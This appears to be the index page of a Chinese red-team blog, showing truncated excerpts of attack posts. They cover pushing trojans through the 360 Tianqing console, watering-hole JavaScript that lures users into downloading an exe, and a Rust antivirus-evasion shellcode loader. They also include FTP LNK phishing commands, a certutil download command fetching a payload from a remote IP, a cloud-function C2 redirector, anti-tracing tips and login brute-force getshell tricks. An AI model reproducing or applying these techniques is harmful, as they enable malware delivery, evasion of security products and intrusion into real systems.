Hyyrent blog

先上个图，后续会持续更新。。 目录扫描模块 域名扫描模块

红队技术-360天擎后渗透利用水坑攻击嵌入js跳转到下载exe木马程序的地方 管理控制台下发木马文件分发-文件管理-上传bat 终端管理-终端任务-新建任务-文件分发 选择执行计划 添加任务成功

外网打点-不靠0day组合拳拿下目标系统案例素材来源于以往参加的攻防比赛和众测项目，旨在拓展外网打点的思路，图片已做去敏处理，如有雷同纯属巧合！ 前期准备防溯源临时VPS：https://aws.amazon.com/cn/campaigns/nc20241001/?trk=870dbb43-c500-4476-8a82-5ea9637bd7a7&sc_channel=psm 代理节点IP：https://www.feiyuip.com/ 记得勾选掉线禁用网卡✔，防止网络切换过程中泄露真实出口IP 演习规则解读 注意 事项 内容 优先目标 攻击范围：提前沟通好目标分子公司是否算范围内，占比多少，提防裁判变卦；多倍积分：关注多倍积分目标，方法用对，事半功倍 协同合作 攻击细节：补充POC等细节，方便与裁判争论和复现；人员分工：A负责外网打点，B负责内网横向等，避免浪费人力，成果通过语雀或雨墨同步 现场洞察和预判 拿分目标：关注大屏攻击动态，找侧重；热点目标：关注裁判沟通内容，通常会讨论被攻击的目标、攻击队利用的攻击手段等；出局预判：关注大屏 ...

Rustloader免杀生成器开发背景由于近年来go用来做免杀器越来越普遍，导致杀软对go编译程序静态查杀力度增大，因此转型投入rust的怀抱 说实话，rust的语法是真难懂，边改边查参考github代码总算是捏出来了 加载方式 使用LoadLibraryA和GetProcAddress从ntdll获取NtQueueApcThreadEx函数。 使用VirtualAlloc分配远程内存。 使用STD::PTR::COPY将SHELLCODE复制到分配的内存。 使用VirtualProtect将内存权限更改为可执行文件。 使用GetCurrentThread获取当前线程句柄。 使用NtQueueApcThreadEx执行SHELLCODE 使用方式和我之前开发的go千机一样，一样是一键化生成，别问，问就是为了最大化的简便，目录结构如下 解压打开文件目录，把 beacon_x64.bin 放置在当前目录下，点击 一键生成.bat 输出免杀文件在 output 文件夹下，随机六位数命名 捆绑文件选择捆绑文件存放在 bundle 文件夹下，默认放置打开损坏文档 如果不需要捆绑文件，把ma ...

简易蜜罐设计流程设计要点部署方式尽量简便，适配环境兼容性高，与客户实际网络环境单独隔离，防止作为跳板进行横向 水坑攻击 部署仿真系统系统攻击者进行攻击 仿真系统需提供接口供攻击队扫描识别漏洞 通过js水坑触发安全控件弹窗诱使攻击者安装 不安装则会重定向到首页 代码实现 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152from flask import Flask, send_from_directory, request, make_responseapp = Flask(__name__, static_folder='static')@app.route('/')def index(): return send_from_directory(app.static_folder, '1.html')@app.route('/test.exe')d ...

开发背景今天好兄弟打项目时候碰到这么一个情况，目标机器访问内网应用需要连接VPN，会切断外网连接，导致beacon无法及时执行回显命令 为了证明能够突破隔离，需要目标机器访问内网应用的截图，于是简单写了下，当作记录 代码实现go build -trimpath -ldflags="-s -w -H windowsgui" main.go 为了避免后续beacon掉线导致进程一直执行，需要设置生成次数限制 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455package mainimport ( "fmt" "image/png" "os" "path/filepath" "time" "github.com/vova616/screenshot")func main() { //路径 s ...

FTP LNK钓鱼技术背景 常规如果使用捆绑程序绑定正常文件和恶意木马释放，会调用很多windows api 这时候会及其容易引起设备的告警 像一些360的杀毒软件，常会产生 qvm 报毒拦截 并且如果蓝方队伍获取了木马程序，扔沙箱里会导致大量的虚拟beacon上线，对正常的攻防活动造成影响 使用方式1、cobaltstrike 生成 beacon_x64.bin，或者使用其他C2的shellcode（文件命名默认为beacon_x64.bin，更换需修改对应的python文件 ） 2、运行 python encrypt.py生成 data.json，里面为加密后的shellcode 3、把 data.json main.py 放到 __init__文件夹里 4、设置属性隐藏文件夹 __init__ 1attrib -s -h -r __init__ LNK属性填写 1C:\Windows\System32\ftp.exe -""s:__init__\python.dll 其中 python.dll 内容为 123!start /b __init__ ...

绕过360远程下载 urlcache中间为中文的双引号 1certutil && certutil -url“”cache -split -f http://121.204.212.212:60212/a bypassQVM上线单360查杀力不高，装了杀毒后直接儿子变爸爸，查杀力大大提升，对于简单的加密识别度较高，容易上线后云查杀过一会掉线，推荐使用分离加载方式，并使用反沙箱的代码延长马子时间 最大的特性是 QVM，360会对可疑程序进行拦截，标签为HEUR/QVM202.0.29xx.Malware.Gen 应对方法：降低熵值 添加图标、签名等可信资源 编译方式优化（使用QT、MFC编译，go使用多种参数结合编译） 加密函数算法使用uuid、rc4等调用库，避免使用AES等可疑算法 添加无用垃圾代码 熵值计算 https://github.com/yutianqaq/EntropyCalc_Go bypass360 psexec直接 psexec 报毒，由于impacket组件横向使用原版程序，hash特征已被标记 原版程序特征在 remcomsv ...

云函数新建一个云函数，在代码位置进行修改 首先导入 yisiwei.zip 的云函数包 12345678910111213141516171819# -*- coding: utf8 -*-import json, requests, base64def main_handler(event, context): C2 = 'https://49.xx.xx.xx' # 这里可以使用 HTTP、HTTPS~下角标~ path = event['path'] headers = event['headers'] print(event) if event['httpMethod'] == 'GET': resp = requests.get(C2 + path, headers=headers, verify=False) else: resp = requests.post(C2 + path, data=event[ ...

红队外网打点实战案例分享从最基础的登录框突破登录框作为hw出现场次最多的角色，也是最容易出洞的，下面介绍一些自己常用的测试方法 登录爆破小技巧 像这种系统的爆破我们有两种解决方法： 分析前端加密算法，写脚本模拟对密码进行加密 固定密码为123456 000000 使用常见的用户名作为字典进行爆破 两种方法各有优劣，我更倾向于第二种，在比赛打点效率会更高，分析加密算法更适用于红队检测项目 使用爆破的账号密码登入后台，便可以继续寻找后台上传点 看到图片类型这里限制上传的文件格式 直接添加 aspx 文件格式类型 成功getshell 修改返回数据包参数进入后台有些时候网站登录状态是根据前端判断的，这时候我们就可以直接修改返回包进行绕过 前端判断登录逻辑根据返回包的ret值决定，当返回值为1则成功登录 成功进入后台 插件探测常见sql注入和log4j漏洞sql注入插件推荐 https://github.com/smxiazi/xia_sql 基本原理是通过发送多个数据包，根据返回数据长度判断是否存在注入 除了被动扫描以外，我们还可以通过手动添加单引号、双引号去查看返回包 ...